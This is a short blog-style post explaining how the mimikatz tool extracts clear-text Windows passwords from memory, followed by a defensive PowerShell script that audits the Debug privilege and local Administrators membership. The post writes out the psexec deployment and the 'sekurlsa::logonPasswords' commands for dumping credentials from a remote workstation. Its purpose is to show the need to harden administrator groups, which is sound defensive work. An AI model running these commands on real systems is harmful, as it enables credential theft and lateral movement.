I have discovered a tool (mimikatz), described here, that exploits Windows system memory to get clear-text passwords.
A description of this tool can be found here:
Mimikatz is a great post-exploitation tool written by Benjamin Delpy (gentilkiwi). A lot of times after the initial exploitation phase attackers may want to get a firmer foothold on the computer/network. Doing so often requires a set of complementary tools. Mimikatz is an attempt to bundle together some of the most useful tasks that attackers will want to perform.
Fortunately, Metasploit has decided to include Mimikatz as a meterpreter script to allow for easy access to its full set of features without needing to upload any files to the disk of the compromised host.
This tool is very simple to use. It works on these operating systems: XP/2003, Vista/2008, 7/2008r2, 8/2012 and 8.1/2012r2, x86 and x64.
A simple test in your environment:
- the IP address or the hostname of a workstation to hack
- get a login with administrative privileges on this machine (member of the local Administrators group)
- the tool PsExec (here)
- uncompress the mimikatz archive (in my example, in the c:\tools folder)
- launch a command prompt
- launch the following command (Win32 or x64 build):
psexec \\10.1.1.1 -c c:\Tools\mimikatz_trunk\Win32\mimikatz.exe
psexec \\10.1.1.1 -c c:\Tools\mimikatz_trunk\x64\mimikatz.exe
- launch the following commands:
mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords
… and appreciate the results
This demo shows that you have to manage and protect the local Administrators group on your systems to limit the use of this tool.
Not yet tested: use Group Policies to remove the Debug privilege. A good description of it is available here
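
To check both controls mentioned above on a given machine (who is in the local Administrators group, and which accounts are assigned the Debug privilege, SeDebugPrivilege), a read-only audit like the following can be run from an elevated PowerShell prompt. This is an added example, not part of the original post; the function names Resolve-Sid and Get-DebugPrivilegeHolders are hypothetical helpers, and it assumes Windows PowerShell 5.1 or later with the built-in secedit tool.

```powershell
# Added example: read-only audit. Run from an elevated PowerShell 5.1+ prompt.

function Resolve-Sid {
    param([string]$Entry)
    # secedit writes principals as "*S-1-5-32-544"; plain account names have no "*".
    if ($Entry -notmatch '^\*(S-1-.+)$') { return $Entry }
    $raw = $Matches[1]
    try {
        $sid = New-Object System.Security.Principal.SecurityIdentifier($raw)
        $sid.Translate([System.Security.Principal.NTAccount]).Value
    } catch {
        "$raw (unresolved)"   # orphaned or foreign SID
    }
}

function Get-DebugPrivilegeHolders {
    # Export only the user-rights area of the local security database.
    $cfg = Join-Path $env:TEMP ("user-rights-{0}.inf" -f [guid]::NewGuid())
    try {
        secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
        $line = Get-Content $cfg | Where-Object { $_ -match '^SeDebugPrivilege\s*=' }
        if (-not $line) { return }   # right is assigned to nobody
        ($line -split '=', 2)[1].Split(',') |
            ForEach-Object { $_.Trim() } |
            Where-Object { $_ } |
            ForEach-Object { Resolve-Sid $_ }
    } finally {
        Remove-Item $cfg -ErrorAction SilentlyContinue
    }
}

'Accounts holding the Debug privilege (SeDebugPrivilege):'
Get-DebugPrivilegeHolders | ForEach-Object { "  $_" }

# S-1-5-32-544 is the built-in Administrators group; the SID works on localized systems.
'Members of the local Administrators group:'
Get-LocalGroupMember -SID 'S-1-5-32-544' |
    ForEach-Object { "  {0} [{1}, {2}]" -f $_.Name, $_.ObjectClass, $_.PrincipalSource }
```

By default the Debug privilege is assigned to the Administrators group, so on an unmodified machine the first list mirrors the second; after the Group Policy change it should be empty or limited to the accounts you chose.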